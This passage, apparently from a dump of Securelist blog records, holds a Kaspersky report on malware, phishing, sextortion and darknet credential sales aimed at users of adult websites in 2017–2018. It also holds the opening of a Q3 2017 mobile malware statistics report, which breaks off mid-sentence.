reselling it at a cheaper price than the cost of a direct subscription.\n\nLast year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.\n\nIt would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.\n\nThat said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.\n\n## Methodology and key findings\n\nTo measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how is it used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network \u2013 the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world \u2013 we measured how often and how many users of our products have encountered adult-content themed threats.\n\nAdditionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.\n\nAs a result, we discovered the following:\n\n * **Searching for pornography online has become safer:** in 2018, there were **650,000 attacks** launched from online resources. That is **36% less **than in 2017 when more than a million of these attacks were detected.\n * **Cybercriminals are actively using popular porn-tags to promote malware in search results. **The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.\n * **In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017,** with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.\n * The number of** unique sales offers of credentials for premium accounts to adult content websites almost doubled** to more than **10,000**.\n * **Porn-themed threats increased in terms of the number of samples, but declined in terms of variety:** In 2018, Kaspersky Lab identified at least **642 families of PC threats** disguised under one common pornography tag. In terms of their malicious function, these families were distributed between **57 types **(76 last year**)**. In most cases they are are **Trojan-Downloaders, Trojans and AdWare.**\n * **89%** of infected files disguised as pornography on Android devices turned out to be **AdWare**.\n * In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached **21,902 attacks**.\n\n## Part 1 - Malware\n\nAs mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users' computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.\n\nTo do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called 'black SEO' techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.\n\nAccording to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word 'porn'), plus those that have the word 'porn' in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against 'black SEO' activities and protecting users from malicious content.\n\n### Porn tags = Malware tags\n\nOptimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims' devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A 'porn tag' is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.\n\nTo check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.\n\nThe overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub's statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.\n\nPerhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn't find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.\n\nMoving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.\n\nThe top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.\n\nDistribution of porn-themed threat types in 2017 | Distribution of porn-themed threat types in 2018 \n---|--- \nTrojan-Downloader | 29% | Trojan-Downloader | 45% \nExploit | 23% | Trojan | 20% \nTrojan | 19% | AdWare (not a virus) | 9% \nAdWare (not a virus) | 11% | Worm | 8% \nWorm | 6% | Virus | 2% \nVirus | 2% | Downloader (not a virus) | 2% \nRiskTool (not a virus) | 2% | Exploit | 2% \nDownloader (not a virus) | 2% | Trojan-Dropper | 2% \nTrojan-Dropper | 1% | UDS: DangerousObject | 2% \nOther | 5% | Other | 8% \n \n_Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_\n\n_Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20151847/threats-to-users-of-adult-websites-in-2018-2.png>)\n\nThe most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (the detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). However, the same detection name applies for another vulnerability in LNK - [CVE-2017-8464.](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>) This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors \u2013 thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).\n\nThe rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim's device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim's device only once and would then be able to use it in multiple malicious ways.\n\n2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.\n\n### Mobile malware\n\nFollowing technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.\n\nThe landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.\n\n**Malware name** | **%** | **Malware name** | **%** \n---|---|---|--- \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 59.61% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 62.88% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 11.02% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 17.09% \nHEUR:Trojan-Ransom.AndroidOS.Zebt.a | 5.33% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 9.62% \nHEUR:Trojan.AndroidOS.Loapi.b | 3.76% | HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 3.27% \nHEUR:Trojan-Ransom.AndroidOS.Small.snt | 2.22% | HEUR:Trojan.AndroidOS.Boogr.gsh | 0.74% \nHEUR:Trojan-Dropper.AndroidOS.Agent.hb | 1.93% | HEUR:Trojan-Ransom.AndroidOS.Small.snt | 0.74% \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 1.90% | UDS:DangerousObject.Multi.Generic | 0.52% \nHEUR:Trojan-Ransom.AndroidOS.Small.as | 1.54% | HEUR:Trojan-Ransom.AndroidOS.Small.as | 0.41% \nHEUR:Trojan-Ransom.AndroidOS.Small.cj | 1.29% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 0.36% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 1.07% | HEUR:Trojan-Ransom.AndroidOS.Small.cj | 0.36% \n \n_Top-10 verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network_\n\nThese threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018) but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.\n\n### Credential hunters\n\nA specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities are they perform, to prevent emerging threats.\n\nWe particularly track botnets that are made of malware.Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprized to discover that there are bots in these botnets that hunt for credentials to pornography websites.\n\nBased on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans, attempting to steal credentials (Betabot, Neverquest and Panda). These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.\n\nIn 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable to ever more cybercriminals.\n\nAnother important shift that happened in 2018, was that malware families do not hunt for credentials to multiple websites. Instead, they focus on just two: mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.\n\nApparently Pornhub remains popular, not only to regular users of the web, but also to cybercriminals looking for another way of gaining illegal profits by selling user credentials.\n\n## Part 2 - Phishing and spam\n\nOur previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.\n\nThese are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4, 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was **1,608**. Within a year, in Q4 2018, the number of such attempts (**21,902**) was more than ten times higher.\n\nThe overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was **38,305**. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were **37,144** attempts to visit the phishing version of the website, while there were only **1,161** attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low, other phishing categories may see detection results of millions of attempts per year. However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.\n\nIt is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to access them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.\n\nFake versions of popular pornography websites target users' credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credentials capture is one of the most popular ways to target users, using pornography to implement phising fraud schemes. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18-years-old.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160843/threats-to-users-of-adult-websites-in-2018-5.png>)\n\nAs the victim enters their password, the threat actor captures the credentials to the user's social network account.\n\nPornographic content phishing can also be used to install malicious software. For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160919/threats-to-users-of-adult-websites-in-2018-6.png>)\n\nNeedless to say, instead of downloading a video player, the user downloads malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160946/threats-to-users-of-adult-websites-in-2018-7.png>)\n\nSometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093209/threats-to-users-of-adult-websites-in-2018-8.png>)\n\n### **Spam-scam**\n\nWe have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of 'standard' advertising offering adult content on legitimate and illegal websites, this type of threat hasn't been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam started to happen. Users started to receive messages containing an extortion letter with a demand to transfer bitcoins to fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143648/threats-to-users-of-adult-websites-in-2018-9.png>)\n\nThe scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. This extortion is based purely on making threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143709/threats-to-users-of-adult-websites-in-2018-10.png>)\n\n2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also 'proving' the legitimacy of the scammers claims by providing the user with actual information about them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143739/threats-to-users-of-adult-websites-in-2018-11.png>)\n\nIn most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143805/threats-to-users-of-adult-websites-in-2018-12.png>)\n\nFurthermore, these e-mails have been sent out in more languages than previously found.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143826/threats-to-users-of-adult-websites-in-2018-13.png>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143902/threats-to-users-of-adult-websites-in-2018-14.png>) \n---|--- \n \nIn reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.\n\n## Part 3 - Darknet insights\n\nOne of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. It is often the case that users can register for pornography accounts through a 'premium' subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people [claim](<https://fightthenewdrug.org/problem-with-paying-for-porn-or-watching-for-free/>) that money paid for porn \"directly fuels the industry that supports the abuse, exploitation, and trafficking around the world\". [Others argue](<https://www.self.com/story/this-is-why-you-should-pay-for-porn>) that pornography is like most other commodities and people are willing to exchange money for it just as they would other kinds of entertainment, such as tv-series or music. Some though prefer to highlight examples of when adult content can result in people being denied their human rights.\n\nWhether it is worth it or not, [some](<https://www.die-screaming.com/porn-memberships-expensive-429291/>) users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.\n\nThe research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb - an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers' feedback. All of them contained one to more than 3,000 offers for credentials to adult content websites. In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with of course, no legal guarantees of delivering on their promise).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143918/threats-to-users-of-adult-websites-in-2018-15.jpg>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093226/threats-to-users-of-adult-websites-in-2018-16.jpg>) \n---|--- \n \nThe results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.\n\nThe quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 \u2013 the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equal amount in bitcoins, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people's credentials while watching pornography.\n\n## Conclusions and advice\n\nOverall, the amount of downloadable malware disguised as pornography detected on users' devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult-content may contain cybersecurity challenges other than the 'classic' infected pornography websites and video files armed with malware. These challenges should be addressed properly.\n\nAnother cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers not corporations, the fact that most consumers have job to go to every day, brings a certain risk to IT administrators responsible for securing corporate networks.\n\nIn order to consume and produce adult content safely, Kaspersky Lab advises the following:\n\n**For consumers:**\n\n * Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.\n * Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.\n * If you wish to buy a paid subscription to an adult content website \u2013 purchase it only on the official website. Double check the URL of the website and make sure it is authentic.\n * Check any email attachments with a security solution before opening them \u2013especially from dark web entities (even if they are expected to come from an anonymous source).\n * Patch the software on your PC as soon as security updates for the latest bugs are available.\n * Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website.\n * Use a reliable security solution with behavior-based anti-phishing technologies \u2013 such as [Kaspersky Total Security](<https://www.kaspersky.com/downloads/thank-you/total-security-free-trial>), to detect and block spam and phishing attacks.\n * Use a robust security solution to protect you from malicious software and its actions \u2013 such as the [Kaspersky Internet Security for Android](<https://www.kaspersky.com/android-security>).\n\n**For businesses:**\n\n * Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.\n * Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as [Kaspersky Endpoint Security for Business](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-advanced>). In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.", "cvss3": {}, "published": "2019-02-21T10:00:01", "type": "securelist", "title": "Threats to users of adult websites in 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2010-2568", "CVE-2017-8464"], "modified": "2019-02-21T10:00:01", "id": "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8", "href": "https://securelist.com/threats-to-users-of-adult-websites-in-2018/89634/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "description": "\n\n## Q3 figures\n\nAccording to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376 **malicious attacks from online resources located in 185 countries all over the world.\n\n**72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\nAttempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.\n\nCrypto ransomware attacks were blocked on **186283 **computers of unique users.\n\nKaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.\n\nKaspersky Lab mobile security products detected:\n\n * **1,598,196 **malicious installation packages;\n * **19,748** mobile banking Trojans (installation packages);\n * **108,073** mobile ransomware Trojans (installation packages).\n\n## Mobile threats\n\n### Q3 events\n\n#### The spread of the Asacub banker\n\nIn the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)\n\nNumber of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017\n\n#### New capabilities of mobile banking Trojans\n\nQ3 2017 saw two significant events in the world of mobile banking Trojans.\n\nFirstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.\n\nInterestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related \u2013 instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)\n\nTrojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand\n\nSecondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.\n\n#### The growth of WAP billing subscriptions\n\nIn the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.\n\nOur Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.\n\n### Mobile threat statistics\n\nIn the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)\n\nNumber of detected malicious installation packages (Q4 2016 \u2013 Q3 2017)\n\n#### Distribution of mobile malware by type\n\n[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)\n\nDistribution of new mobile malware by type (Q2 and Q3 2017)\n\nRiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.\n\nTrojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.\n\nThe share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% \u2013 almost 4 p.p. less than in Q2.\n\nIn Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.\n\n#### TOP 20 mobile malware programs\n\n_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| Verdict | % of attacked users* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 67.14 \n2 | Trojan.AndroidOS.Boogr.gsh | 7.52 \n3 | Trojan.AndroidOS.Hiddad.ax | 4.56 \n4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 \n5 | Trojan.AndroidOS.Loapi.b | 2.91 \n6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 \n7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 \n8 | Backdoor.AndroidOS.Ztorg.c | 2.09 \n9 | Trojan.AndroidOS.Agent.gp | 2.05 \n10 | Trojan.AndroidOS.Sivu.c | 1.98 \n11 | Trojan.AndroidOS.Hiddapp.u | 1.87 \n12 | Backdoor.AndroidOS.Ztorg.a | 1.68 \n13 | Trojan.AndroidOS.Agent.ou | 1.63 \n14 | Trojan.AndroidOS.Triada.dl | 1.57 \n15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 \n16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 \n17 | Trojan.AndroidOS.Hiddad.an | 1.48 \n18 | Trojan.AndroidOS.Hiddad.ci | 1.47 \n19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 \n20 | Trojan.AndroidOS.Agent.eb | 1.29 \n \n_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._\n\nFirst place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.\n\nAs in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.\n\nTrojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&amp;C. The Trojan requests administrator rights to prevent its removal.\n\nTrojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan \u2013 a representative of the Loaipi family. One of them \u2013Trojan.AndroidOS.Loapi.b \u2013 came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.\n\nTrojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>)and [Svpeng ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>)mobile banking families.\n\nIn seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&amp;C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.\n\nTrojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them. It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).\n\nTrojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.\n\nOccupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.\n\nTrojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, 